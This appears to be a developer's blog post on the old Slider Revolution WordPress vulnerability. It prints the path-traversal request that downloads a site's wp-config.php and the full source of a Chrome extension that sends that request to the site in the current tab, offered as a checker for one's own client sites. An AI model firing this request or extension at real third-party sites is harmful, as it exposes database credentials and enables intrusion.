History
While the Slider Revolution exploit is, at this point, fairly old news, it seems that not everyone got the memo. In a recent post by Wordfence, they claim that the recent Panama Papers fiasco may have begun by a breach of the Mossack Fonseca web server through this exploit.
The agency where I work applied fixes to all of our client sites as soon as the initial news hit, but I have a college friend who recently inherited a number of WordPress websites at his job. After reading the Wordfence article, he realized he didn’t know if any of his new clients had versions of the plugin that would still be vulnerable. Of course the simple answer is “go update all of your plugins”, but since the plugin is baked into the theme in so many cases (and how many made-by-another-developer sites do you have that are all properly child-themed and easy to update?) he couldn’t simply go to his Plugins page on every site to download the new version.
The exploit itself is quite easy to test for: simply use your browser to navigate to admin-ajax.php
with the appropriate parameters, and if the site is running a vulnerable copy of the plugin your browser will automatically download the site’s wp-config
file.
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Solution
What I did to help him out was write a quick Chrome Extension that allowed him to browse to his client sites, click the button, and the extension would attempt to download the `wp-config.php` file from the server. If he got the file, he knew he had a problematic copy of Slider Revolution. If the site responded in any other way, he was likely fine.
The extension was put together in about 15 minutes, and is the first Chrome Extension I’ve written, so it isn’t very fancy. I could have done something rather than try to download the file in the browser, so we could display “success” or “failure” when trying to exploit the site. It also assumes that WordPress lives at the root of the website, since the extension will attempt to access `/wp-admin/` at the root of the domain – if a site has a vulnerable plugin installed but, for example, contains the WordPress installation in the `/wordpress/` directory, this extension will not effectively find the exploitable path.
Download
> Click here to download the extension now
I’m distributing the extension in its “unpacked” state, so that people can review it before use. Since the zip file contains a folder with all of the raw files, you will need to enable Developer Mode in Chrome in order to load the extension if you’d like to use it yourself. Click here for instructions on how to load an unpacked extension in Google Chrome
NOTE: Obviously you use this code at your own risk and for your own purposes. You alone are responsible for your own actions. I cannot be held responsible for anything you do with this extension, or the code/information provided on this page.
Source
You may also view the source code of the `manifest.json` and `background.js` files below, which are the only pieces of code in the whole extension. Enjoy!
{ "manifest_version": 2, "name": "Revolution Slider Checker", "description": "This extension will check the current website to see if their Revolution Slider is vulnerable to the known exploit that allows you to download the wp-config.php file", "version": "1.0", "browser_action": { "default_icon": "icon.png", "default_title": "Click here to check" }, "background": { "scripts": ["background.js"] }, "permissions": [ "activeTab" ] }
// More info on the Slider Revolution exploit // https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html chrome.browserAction.onClicked.addListener(function(tab) { var uri = tab.url; var origin = uri.match(/^[\w-]+:\/{2,}\[?[\w\.:-]+\]?(?::[0-9]*)?/)[0]; // regex taken from http://stackoverflow.com/questions/3689423/google-chrome-plugin-how-to-get-domain-from-url-tab-url chrome.tabs.update(tab.id, { url: origin + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' }); });